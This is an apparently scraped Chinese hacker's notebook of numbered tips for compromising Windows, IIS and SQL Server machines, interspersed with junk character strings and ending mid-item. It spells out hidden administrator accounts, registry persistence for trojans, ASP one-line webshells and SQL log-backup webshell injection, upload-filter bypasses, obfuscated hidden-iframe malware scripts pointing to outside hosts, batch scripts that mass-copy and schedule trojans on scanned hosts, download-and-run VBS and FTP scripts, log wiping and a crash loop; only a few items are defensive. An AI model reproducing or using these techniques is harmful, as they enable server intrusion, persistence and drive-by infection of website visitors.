一些笔记

admin

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
cacls C:\windows\system32 /G hqw20:R
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
' U* N5 J$ y9 B5 C4 P* \. A3 G- p恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

, ?, i/ A. R" S$ I# V2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。
7 ]6 O7 P  @6 u( Y, W  q
4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号

/ \- E$ t6 S. W7 U0 \/ q  X  u5、利用INF文件来修改注册表
8 r7 u& f0 |" C/ H3 p. c. M[Version]
+ D- P& u) [% h( u" w- V  V, i: ~Signature="$CHICAGO$"
/ Y9 m4 u$ x* `" s[Defaultinstall]
9 S  J0 k5 T% t% N; L- c0 l: Y/ ^: Q% ?addREG=Ating
[Ating]
. D) U3 q0 l. K- v; w/ \0 qHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* z9 S/ o& i) q0 |/ V/ {& A以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( S; k+ T+ ]5 ^0 M其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
- H- i0 v4 f" |1 J/ C2 h! KHKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
HKEY_CURRENT_CONFIG 简写为 HKCC
0x00000000 代表的是 字符串值，0x00010001 代表的是 DWORD值
4 S* K7 m/ h& ?9 }- x1 n"1"这里代表是写入或删除注册表键值中的具体数据
6 q/ _' e) a2 v0 ^. e) d" p' |
6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
2 \% F1 v* x9 P% M' q
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
( O( f$ R  F5 E9 ~& M  U在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。
, I  g( x9 T/ T5 A0 A" }- a  F6 h' T
2 X8 L/ o5 ^9 H! Y8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

% w; E1 ~3 Q* p1 O- e% N9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
* K& z. v: t! K) o2 Q可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
5 S- h. K3 h; p7 f2 N4 d
5 F# ^; N  L$ }10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
9 Y0 P- e6 o. @% R$ X0 m& Q: v
, G+ a% n* d0 y7 g0 g0 u- V11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
用法：xsniff –pass –hide –log pass.txt

" `* A6 \- |7 P( q, r( d2 S12、google搜索的艺术
( [  o4 O0 z1 f6 p搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
或“字符串的语法错误”可以找到很多sql注入漏洞。

4 D  j. ^) P2 u% @- A9 I' f13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
# Z8 g1 h8 ~) p6 b, ^/ o  H% }
8 G$ ]5 s% I# B+ \& F14、cmd中输入 nc –vv –l –p 1987
8 Y0 @0 s+ W2 Z! F5 _  s做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
) e/ w9 Z3 P' r
" r4 l! y5 t: M* A! L/ W, K/ J* i4 W15、制作T++木马，先写个ating.hta文件,内容为
<script language="VBScript">
- u% r2 @; I* T+ \- U- a! l7 Z4 Wset wshshell=createobject ("wscript.shell" )
a=wshshell.run("你马的名称",1)
window.close
# t2 U/ k6 y. s0 @' b; M' I" [</script>
+ O! n( O" M1 s8 h: ~, {9 c再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。

16、搜索栏里输入
关键字%'and 1=1 and '%'='
; ^4 X# v2 x+ T! d关键字%'and 1=2 and '%'='
6 Z6 r; x' s3 {0 g1 a6 f比较不同处 可以作为注入的特征字符
6 }2 ^+ D* E6 v: n% {$ X
17、挂马代码<html>
  O: i2 b  H' G<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
. M  b- _# Z+ s( X( Y</html>
0 z: l: ?) D- D2 C5 x
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
8 C; |# O2 C+ f) z/ |* _( S: wnet localgroup administrators还是可以看出Guest是管理员来。
  d& K7 s. V" K$ n( m: |. w% K. p1 F2 A
3 |+ Q; L/ M. l% G19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
卸载： instsrv.exe 服务名称 REMOVE
3 m" h5 [% j. {3 j) [
# @" a9 Q  b. h  |" w6 n. h
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库。
" O" j9 J9 ?. P9 q& y5 a' e* S
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

* L1 ^1 v) ^* P3 Q: h% l: ~* q" H23、缺少xp_cmdshell时
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 Z" K/ z  E6 ~6 D假如恢复不成功,可以尝试直接加用户(针对开3389的)
; W3 e7 G5 Q/ s6 Q" t6 ^2 }declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员

24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头

" d! n+ ^  |+ V" k25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
' w; [, C; u# F" y4 w" A/ U
3 x$ y: ?; U$ I26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志

8 j. Y; v3 R* U7 @" r6 ?- W' s0 w28、电脑坏了省去重新安装系统的方法
& u) E( z7 _! N6 N6 j' N. @+ j& C& `- q纯dos下执行，
- J7 c$ u6 K$ `5 q9 ^  ^xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config

2 m% ]7 R/ e) c2 @29、解决TCP/IP筛选 在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
) _  ^) m3 A. r" Z0 dHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% R! X+ l3 g' |" p1 P/ Nregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 n, A, g8 W2 a# r$ w! P命令来导出注册表项
然后把三个文件里的EnableSecurityFilters"=dword:00000001，
5 O; f  a7 P5 r& I4 x改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
4 l; z) a: _$ Yregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
- \0 E( \  D9 y
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 h: X4 m, d4 B0 j! sSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
8 K; O' P6 E+ G2 `9 [! Z" h/ L' Y
" a( l9 B* \# M  X* n31、全手工打造开3389工具
打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
4 b# D) ]' P0 K- @( u# c+ O% [编辑好后存为BAT文件，上传至肉鸡，执行

32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
+ V; \/ Y/ u% x
6 f% o; M  v! k2 H33、让服务器重启
+ B2 d+ Y5 @8 h3 T3 v) x# C写个bat死循环:
( q7 }" r8 ?& @8 l1 J@echo off
; ^8 w# Y2 f/ M. }/ J% {: c:loop1
cls
1 o7 [! L+ ]. U" pstart cmd.exe
" `" s( C# Z; O  sgoto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
+ s/ p% h, Z  ~( q( Z@echo off
date /t >c:/3389.txt
time /t >>c:/3389.txt
attrib +s +h c:/3389.bat
+ s, i# u8 T2 A4 F  qattrib +s +h c:/3389.txt
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( q1 C! r& D: k; R2 [. P8 I' F- q并保存为3389.bat
打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号
- }* J7 D/ k; f: a; X6 A) U
9 H9 x- k  V7 W5 y35、有时候提不了权限的话，试试这个命令，在命令行里输入：
! D! w% t- ?9 S" _& r& u) c4 Ystart http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
输入：netstat -an | find "28876" 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。

36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
! O" v9 R, _, `7 V8 ~: u. I$ T; uecho bin >>c:\1.bat //登入
9 b3 N5 F. t" D: f  jecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
; X9 x/ f- \! }3 j6 G8 ?echo bye >>c:\1.bat //退出
然后执行ftp -s:c:\1.bat即可

37、修改注册表开3389两法
: O- J: [' X' V5 m5 p（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
3 ~7 S$ @% @4 q4 ?3 a" Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
: I9 Z/ ]) v9 C) vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
$ S' M& n% W1 V! A) CNT\CurrentVersion\Winlogon] >>3389.reg
) T6 W2 y3 |/ B% C4 \# l  H, recho "ShutdownWithoutLogon"="0" >>3389.reg
4 S) Q# A' A' L8 F& Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) ]; K! C) M# @2 P/ |7 Q* F! S>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
! r  J5 ~1 d% ?9 mecho "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 P" H3 v3 ]- z2 l>>3389.reg
1 Q( i5 G! D7 decho "Start"=dword:00000002 >>3389.reg
0 T( K* l6 o  G) B4 kecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
+ |8 d1 A$ J0 A3 ]# T4 P" B0 i3 Wecho "Hotkey"="1" >>3389.reg
( m' B$ n- i2 I5 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 ^  d# G5 Y( g: `. Z  M3 y+ yServer\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 o4 @3 p. D# y* xServer\WinStations\RDP-Tcp] >>3389.reg
/ m4 ]8 J  \5 I: O6 fecho "PortNumber"=dword:00000D3D >>3389.reg
! a& |' Q) }$ Y0 h' T2 S$ W把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
& c6 Q) {: }$ J$ v8 v(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
( F" z- ?/ E! I9 a0 `! C/ q（2）winxp和win2003终端开启
用以下ECHO代码写一个REG文件：
1 l$ }  `/ f7 {9 Uecho Windows Registry Editor Version 5.00>>3389.reg
7 Q4 A6 K. A3 H/ w$ t4 W0 b- N# Q" @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 |- D: a1 j- e/ MServer]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
' r6 F" q+ u0 |5 Y  J5 necho "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]>>3389.reg
$ s( t; a: T) Q$ D1 a2 W# H' c4 fecho "PortNumber"=dword:00000d3d>>3389.reg
然后regedit /s 3389.reg del 3389.reg
- X9 }1 W: U6 n/ ~6 QXP下不论开终端还是改终端端口都不需重启

38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
1 d9 |9 x$ M& U; D$ s* Z用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'

39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
7 B' @. p3 {: }! E（1）数据库文件名应复杂并要有特殊字符
7 t& S3 f# W7 i（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
& \( l8 q' Y1 f7 N将conn.asp文档中的
DBPath = Server.MapPath("数据库.mdb")
$ D+ u  x/ L8 v, u" J( Xconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" ＆ DBPath
, P, G( g! N+ H6 e4 S4 c
' h. W4 u; M! U0 t! V  W' X( W- i7 p修改为：conn.open "ODBC数据源名称," 然后指定数据库文件的位置
（3）不放在WEB目录里
  p3 V" \* c) Q* x5 ]* z
40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
0 y# y. C) P# H" w. E$ V3 l  l6 r@echo off
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
3 q; E+ w1 U5 ^) C: {# w$ H@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
" \0 L7 Z. |! V, I
@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
. S! A2 W7 g* A" o, b) h& E$ m
41、映射对方盘符
# j0 {  d4 w4 V, i1 G: [2 Utelnet到他的机器上，
) e3 O7 ~) o, C4 C9 t* U! \net share 查看有没有默认共享 如果没有，那么就接着运行
; ^8 u+ X. J! j: Qnet share c$=c:
net share现在有c$
在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K

6 q8 `6 q) C% t- o5 n- G42、一些很有用的老知识
# ~9 W5 a" g: h9 ^& w0 W% U0 Ztype c:\boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
  a; S4 X' t% R# b5 I  J; F& znet user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
6 r/ [2 e/ i" W+ E7 |8 w6 dnet localgroup administrators 用户 /add (提升某用户为管理员)
! P# c8 `0 y- {; E* D- E7 xipconfig -all ( 查看IP什么的 )
- x' M& Y" Y# Y6 ?% y! knetstat -an ( 查看当前网络状态 )
' F  l" B7 \- lfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ Z  a  j% f4 u5 C: k克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8
5 s" l; a1 k2 A/ Z- ]
43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"

44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
) S0 n. L4 k8 T3 Z* s本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）
- @! \0 c# \4 m. T' [9 B0 Q+ `7 k
45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
+ o6 A3 P: R# L" f1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
# [9 L3 p' f9 l* ^/ n9 I! `9 O. P. [5 U（这是完整的一句话，其中没有换行符）
0 i" i5 P4 E( i/ r. H  i然后下载:
8 [3 a$ ^& i! G# M0 A. ]+ q6 ^5 zcscript down.vbs http://www.hack520.org/hack.exe hack.exe

46、一句话木马成功依赖于两个条件：
１、服务端没有禁止adodb.Stream或FSO组件
3 b: n2 t( C! N9 `8 l) F3 d$ Q２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
' r% _: V$ c# h& T
. J9 l* x# h5 s( _1 U* z- \47、利用DB_OWNER权限进行手工备份一句话木马的代码：
: v, `8 o, q: k0 _- Q;alter database utsz set RECOVERY FULL--
. w9 b* W, x0 c: k" N$ M* E;create table cmd (a image)--
;backup log utsz to disk = 'D:\cmd' with init--
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
4 `) F! p1 Z  I/ K;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。

% q4 V0 {# Y) }5 n" D48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) m$ a. O: s" D% \1 m+ Y) d2 i: T所有会话用 'all'。
% X5 E% ]' _% J; _# y. A4 W-s sessionid 列出会话的信息。
-k sessionid 终止会话。
-m sessionid 发送消息到会话。
- y* s! `5 p% ~* h7 o
% u7 G: t2 }2 t* ?9 `config 配置 telnet 服务器参数。

+ M& T6 s* B8 ~/ K; i& I6 C; D; V! Gcommon_options 为:
-u user 指定要使用其凭据的用户
3 c3 }1 H1 }& R) Z' L- O- w5 W$ y# s6 @-p password 用户密码
* h; d* Z: Z8 }1 k& Y
config_options 为:
" P+ A. t4 ?( K7 O! xdom = domain 设定用户的默认域
ctrlakeymap = yes|no 设定 ALT 键的映射
timeout = hh:mm:ss 设定空闲会话超时值
6 |! t6 P1 A! E1 p4 U' |5 _timeoutactive = yes|no 启用空闲会话。
maxfail = attempts 设定断开前失败的登录企图数。
9 Y) \  C+ f" O8 s- p0 }. {( y( umaxconn = connections 设定最大连接数。
: Z2 O$ Z  H, F- n) B$ ~port = number 设定 telnet 端口。
; [  }$ G9 Q) Q. R  U+ u* gsec = [+/-]NTLM [+/-]passwd
$ W& C9 T& N( R  m( l. w; F设定身份验证机构
fname = file 指定审计文件名。
) o% U3 x* l! F0 S& ]# n$ W6 B) afsize = size 指定审计文件的最大尺寸(MB)。
" B* A$ w/ b% p8 n: I+ w" Ymode = console|stream 指定操作模式。
auditlocation = eventlog|file|both
指定记录地点
audit = [+/-]user [+/-]fail [+/-]admin

49、例如:在IE上访问:
5 x) }: Q, _; ewww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
hack.txt里面的代码是：
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

50、autorun的病毒可以通过手动限制！
* Z) f, G; m4 X" H$ p& u4 `8 w1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
3 J5 S$ j6 b0 s$ i, T7 ^" j2，打开盘符用右键打开！切忌双击盘符～
. u8 S, o" F$ |+ }3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！

- W$ s) [/ L! L# o  B% c51、log备份时的一句话木马：
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
7 P$ L  [8 G: i# yd).<script language=VBScript runat=server>execute request("sb")</Script>
& `' Z4 s  z; ]  j6 oe).<%25Execute(request("l"))%25>
f).<%if request("cmd")<>"" then execute request("pass")%>
0 A% C. V. C* u+ G
  @: }- f. `# V0 P. ^7 K52、at "12:17" /interactive cmd
执行后可以用AT命令查看新加的任务
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
5 O9 E- r" t) a2 M2 d
# {: o0 i& w/ a, Z3 s  O, D4 B  b) ^53、隐藏ASP后门的两种方法
& E* R/ L) y2 }/ p8 X) K6 F1、建立非标准目录：mkdir images..\
$ t5 V  e8 \3 S/ P! i拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
) c& x& F5 v8 x' B* u, R如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
" p$ H' l: ^. }1 u" xmkdir programme.asp
新建1.txt文件内容：<!--#include file=”12.jpg”-->
新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
$ n4 o" i4 Q3 C* J& i2 hattrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt

4 l  m% |+ s+ X! @- R. [9 z54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。
, i* q& `4 U; p! [2 C9 b
' Q8 m5 {3 |! X0 m& Y" k% a55、JS隐蔽挂马
1.
var tr4c3="<iframe src=ht";
5 h! e, P3 ?, D2 ]& B, c# utr4c3 = tr4c3+"tp:/";
tr4c3 = tr4c3+"/ww";
% |  I& S) S2 P; I+ |tr4c3 = tr4c3+"w.tr4";
tr4c3 = tr4c3+"c3.com/inc/m";
tr4c3 = tr4c3+"m.htm style="display:none"></i";
tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
* z3 R4 V/ E& _- C& y避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。

& ?( D$ k% Y) D8 d, {2.
2 R' Y6 h/ H  U转换进制，然后用EVAL执行。如
# C( O& e1 D3 |; }eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
: _( c# K) ]7 V# Z' j! r0 @不过这个有点显眼。
/ U2 [# i2 v6 g8 z8 q# T1 |3.
) o  N; o' F$ [8 r" Ndocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
最后一点，别忘了把文件的时间也修改下。

56.3389终端入侵常用DOS命令
- A) G3 T' _4 c: ~2 j& O8 K' ataskkill taskkill /PID 1248 /t
" K* N  R/ `: G+ f, e/ M; t) B% A6 V
tasklist 查进程

$ x5 B# }- N( V: T4 Wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
: u) p6 U) N0 W$ s, g% }* viisreset /reboot
! s0 s; R7 b" r1 r3 W( otsshutdn /reboot /delay:1    重起服务器

logoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，
, e- \- S$ Y- E" C. P4 v
query user 查看当前终端用户在线情况
$ ~# ]/ X6 v* n( E, a' B
) [- {+ R. [( F* ^7 y2 |要显示有关所有会话使用的进程的信息，请键入：query process *

7 A! Y: \# t! l% i4 J要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2
8 [2 U! X4 o% I: {
要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

4 a! f; g  U3 F$ k' t, `: p3 o命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

. m' W8 S$ D5 u# f8 m9 B  b; R命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统

$ v; n) q+ G3 v9 u3 ~" V/ O8 s命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

6 o+ ^9 n. a) w7 A命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
9 m( r8 ]. Q6 t" S2 z
56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;

源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。

57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
用net localgroup administrators是可以看到管理组下，加了$的用户的。
# e8 \9 y2 v9 }: B
6 Q, D! B: i/ B2 \' g( l  r58、 sa弱口令相关命令
8 Z" g& D& T  w/ A  f1 C3 B
7 ^% j4 o- H. m+ a+ K) `( R一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
9 T8 T+ w' J& W# X! Jexec sp_password NULL,'20001001','sa'
7 D& F8 h1 j6 l' \2 H+ c(提示：慎用!)

二.简单修补sa弱口令.
3 [, e& K- L0 n2 \0 L0 d& l* S0 a/ c
1 e4 l5 G9 y, I) q% i7 A方法1:查询分离器连接后执行：
if exists (select * from
. b+ j0 t& o* u! S3 i; b$ e! i4 odbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
- @& l' i, y. P& iOBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' D, w. ?& q0 P4 e% B, w& ~
GO

  ]/ w- _9 g5 J% S& M# A* n然后按F5键命令执行完毕

方法2:查询分离器连接后
第一步执行：use master
第二步执行：sp_dropextendedproc 'xp_cmdshell'
然后按F5键命令执行完毕

- n8 @# V; {! H& @# U* Q9 }5 U+ u
4 o$ i# F8 F0 w9 n( S- S% B三.常见情况恢复执行xp_cmdshell.

9 p: K+ B: c$ M( c( z
1 未能找到存储过程'master..xpcmdshell'.
0 f5 l% }" h" i$ ^, e' n9 ~   恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ J! b! ~+ D0 v4 f第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
8 P- v! c% c' G! }5 ^$ r
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
